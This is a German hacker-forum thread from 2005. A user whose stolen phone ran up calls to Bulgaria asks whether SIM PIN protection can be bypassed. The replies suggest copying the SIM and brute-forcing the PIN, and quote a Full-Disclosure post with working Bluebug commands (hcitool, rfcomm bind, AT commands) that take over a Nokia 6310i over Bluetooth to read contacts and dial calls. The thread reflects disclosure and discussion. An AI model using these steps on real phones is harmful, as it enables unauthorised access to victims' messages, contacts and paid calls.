Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene.

pinumgehung bei handy doch möglich ?

Diskussion: pinumgehung bei handy doch möglich ? im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige hallo ....ich hab ein problem und nachdem ich bei meinen recherchen auf das board kam, wollt ich mich mal ...

Antwort
Alt 31.01.05, 15:50   #1 (permalink)
 
Registriert seit: 31.01.05
schnakes Leistung: Facit NTK
Likes: 0
Standard pinumgehung bei handy doch möglich ?

Anzeige

hallo ....ich hab ein problem und nachdem ich bei meinen recherchen auf das board kam, wollt ich mich mal erkundigen. mir ist vor weihnachten mein nokia 3510 i abhanden gekommen, was aber AUS geschaltet war. erst dachte ich , ich habs verlegt und nicht intensiv gesucht. dann hab ichs sperren lassen und eine neue karte bekommen. bei der rechnung traf mich der schlag, hatte doch einer fröhlich 2 tage nach bulgarien telefoniert für schlappe 500 euro bis vodaphone das selber gesperrt hat, weils ihnen wohl komisch vorkam. ich hatte mich aber in sicherheit gewogen , weil behauptet wird von vodaphone ,man könne die pin abfrage nicht umgehn. die kripo meinte , es lägen bei ihnen vage erkenntnisse vor, dass es da wohl schon dinge gäbe, die simcards- ähnlich der scheckkarte - auf blancocards zu kopieren und dann mit neuer pin zu versehen und zu telefonieren.sei im ostblock sehr beliebt und würde zu uns schwappen.. nur könnten sie mir nicht wirklich was dazu sagen , sie seien technisch noch nicht soweit !!!!!!
ich muss also um bei vodaphone meine haftungsgrenze anerkannt zu kriegen irgendwie rauskriegen ob das machbar ist theoretisch und wie....ich find nur leider nichts dazu im netz ...könnt ihr mir da ein paar tips geben wo ich anfragen kann und soll ? das lka bayern ist jedenfalls noch nicht soweit, dass sie kapieren wie das gemacht wird.
vielen dank :-)
schnakes

schnakes ist offline   Mit Zitat antworten
Alt 31.01.05, 16:40   #2 (permalink)
Senior Member
 
Registriert seit: 23.12.03
silenced Leistung: Facit NTK
Likes: 0
Standard

Evtl hiermit ?
http://ucables.com/ref/SIM-BACKUP

Kopieren und Bruteforce auf die Pin ??

Über das bin ich auch noch gestolpert
http://simlock.siemensiak.pl/techgsm...Solutions.html
silenced ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 31.01.05, 17:18   #3 (permalink)
Themenstarter
 
Registriert seit: 31.01.05
schnakes Leistung: Facit NTK
Likes: 0
Standard

hallo :-)) danke für den link des progis, ich weiss zwar nicht ob die das als beweis akzeptieren,aber vielleicht finde ich noch irgendwo berichte, dass das knacken einer d2 simcard älteren baujahrs ( meine stammte von 2000/01 aus meinem alten 3310) bereits gelungen ist. vodaphone streitet die möglichkeit ja kategorisch ab und es geistern ja durchaus gerüchte herum, dass das anderen wohl testweise schon gelungen sei.
gruss schnakes
schnakes ist offline   Mit Zitat antworten
Alt 04.02.05, 06:49   #4 (permalink)
Senior Member
 
Registriert seit: 23.12.03
silenced Leistung: Facit NTK
Likes: 0
Standard

Da sind sie :-)

Adam Laurie napisaB(a):
> Details of the attacks were disclosed at the Chaos Computer Club's annual > congress in Berlin - 21C3:

According to the [1], not all details were disclosed. Actually, there is no
reason for keeping them secret here, while they are well known and actively
exploited in the blackhat community.

The Bluebug, as described on [1] is trivially exploitable on some non-Symbian
Nokia phones. It allows attacker to create serial profile connection without
pairing or asking for permission, therefore it gives unauthorized access to all
AT commands. It is possible to read/delete/send SMS messages, add/view/delete
phonebook entries, change call diverts, initiate voice or data call.

Demonstration on Nokia 6310i:

laptop:~# hcitool scan
Scanning ...
00:60:57:38:8C8 Nokia 6310i
laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C8 17

Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for
example:

laptop:~# cu -l rfcomm0 -s 9600
Connected.
[ATE1]
OK
ATI
Nokia

OK
AT+CPBS?
+CPBS: "SM",0,100

OK
AT+CPBR=?
+CPBR: (1-100),48,18

OK
ATDT+48609xxxxxx
OK


As you can see, the bug is really trivial and looks rather like backdoor.


[1] - http://www.thebunker.net/security/bluetooth.htm
[2] - http://ncsp.forum.nokia.com/download...11579;ref=devx
[3] - http://www.gnokii.org/

Quelle: Full-Disclosure
silenced ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » (In)security allgemein » pinumgehung bei handy doch möglich ?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Schäuble ist doch harmlos... detrexer News & Ankündigungen 15 19.10.07 13:09
ASP, PHP oder doch PERL? ghostdog Code Kitchen 18 22.04.06 09:30
->!!!Final Fantasy X und X-2 doch für PC!!!<- Master-X Games 22 05.03.04 22:07
MAL was Anderes und doch das gleiche MATRIX3 (In)security allgemein 16 26.11.03 09:25
ist doch logisch, oder? derBlubb Off topic-Zone 0 19.12.01 13:57


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61